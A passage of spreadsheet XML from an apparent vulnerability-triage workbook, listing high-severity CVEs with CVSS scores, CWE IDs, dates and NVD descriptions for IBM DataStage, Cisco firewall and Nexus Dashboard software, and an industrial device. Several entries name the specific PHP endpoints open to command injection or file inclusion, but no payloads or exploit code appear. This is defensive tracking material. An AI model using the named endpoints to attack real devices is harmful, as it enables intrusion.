      <c r="Q141" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to execute arbitrary code due to improper configuration of the XSLT transformation engine.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16428</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16466</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to execute arbitrary commands due to os command injection.</t>
        </is>
      </c>
      <c r="S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16466</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16673</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to execute arbitrary OS commands due to improper neutralization of special characters in the PxPeek name property.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16673</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20333</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20333 are related to incorrect comparison conditions that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-697.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20333</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20336</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-664</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20336 are related to issues concerning improper control of a resource through its lifetime that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-664.</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20336</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20340</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Secure FMC Software could allow an authenticated, remote attacker to execute arbitrary commands at the&amp;nbsp;root privilege level.
This vulnerability is due to unsecured deserialization of web-management user-controlled data. An attacker could exploit this vulnerability by authenticating to the device and sending a crafted HTTP payload. A successful exploit could allow the attacker to save the crafted payload and then execute it on the underlying operating system as root.
To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Security Analyst (read-only).</t>
        </is>
      </c>
      <c r="S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20340</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20344</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Secure FMC Software could allow an authenticated, remote attacker to perform a SQL injection attack against an affected device. To exploit this vulnerability, the attacker must have a valid account on the device with the role of Security Approver, Access Admin, or Network Admin.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain any data from the database, obtain the session credentials of an authenticated Administrator, and take actions with administrative privileges on the affected device.</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20344</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20360</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20360 are related to information exposure and insecure handling issues that are grouped under the Common Weakness Enumeration (CWE) CWE-200.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20360</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20361</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20361 are related to SQL injection issues that are grouped under the Common Weakness Enumeration (CWE) CWE-89.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20361</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27547</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/get_iodd_menu_info endpoint using valid user or operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27547</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27548</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/get_iodd_port_info endpoint using user or operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27548</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27549</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/attached_devices_tab/do_upload endpoint using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27549</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27550</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the Field_Shadow_Password class using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27550</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27551</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/parameterManage endpoint using user credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27551</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27554</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/save_iodd_parameters endpoint using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27554</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27555</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a local file inclusion vulnerability in the /index.php/ajax/get_iodd_port_info endpoint using a valid user cookie allowing execution of arbitrary PHP code on the device.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27555</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27556</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a local file inclusion vulnerability in the /index.php/ajax/save_iodd_parameters endpoint using a valid operator cookie allowing execution of arbitrary PHP code on the device.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27556</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27558</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
